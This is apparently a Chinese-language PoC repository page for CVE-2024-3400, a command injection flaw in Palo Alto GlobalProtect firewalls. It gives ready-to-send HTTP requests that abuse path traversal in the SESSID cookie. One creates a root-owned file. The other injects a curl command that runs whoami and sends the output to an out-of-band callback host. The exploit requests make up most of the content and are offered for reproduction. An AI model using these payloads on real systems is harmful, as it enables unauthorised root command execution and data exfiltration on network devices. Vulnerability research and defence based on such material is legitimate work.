来源

关联漏洞

描述

CVE-2024-3400的攻击脚本

介绍

# CVE-2024-3400 漏洞 PoC（验证工具）

## 漏洞描述

CVE-2024-3400 是一个存在于 Palo Alto 防火墙系统中的命令注入漏洞。攻击者通过精心构造的 HTTP 请求，能够在目标服务器上执行恶意命令，甚至获取 root 权限。

## 漏洞复现步骤

1. 发送以下 HTTP 请求：

```http
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```

发送这个请求后，您将在服务器上创建名为 `hellome1337.txt` 的文件，并且该文件会拥有 root 权限。

2. 当您尝试访问该文件时，应该会返回 HTTP 状态码 403（禁止访问），而不是 404（未找到）。

截图展示了此漏洞利用过程中的效果：

![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/96803de5-1d8c-42ec-b1fc-60e8e4a0a954)

![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/e579d4a6-11a5-4f7c-a3da-ba7b0cfa8a4d)

## 命令注入示例

为了利用该漏洞执行命令注入，您可以发送如下 HTTP 请求：

```http
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```

此请求会在服务器上执行 `whoami` 命令，并将结果发送到指定的远程服务器（例如：`xxxxxxxxxxxxxxxxx.oast.fun`）。

## 进一步阅读

- [Rapid7 分析](https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis)
- [WatchTowr 实验室分析](https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/)

文件快照

 [4.0K]  /data/pocs/0473537b89bed83651060d3c2f51c3a660b76358
├── [ 11K]  LICENSE
└── [1.8K]  README.md

0 directories, 2 files

备注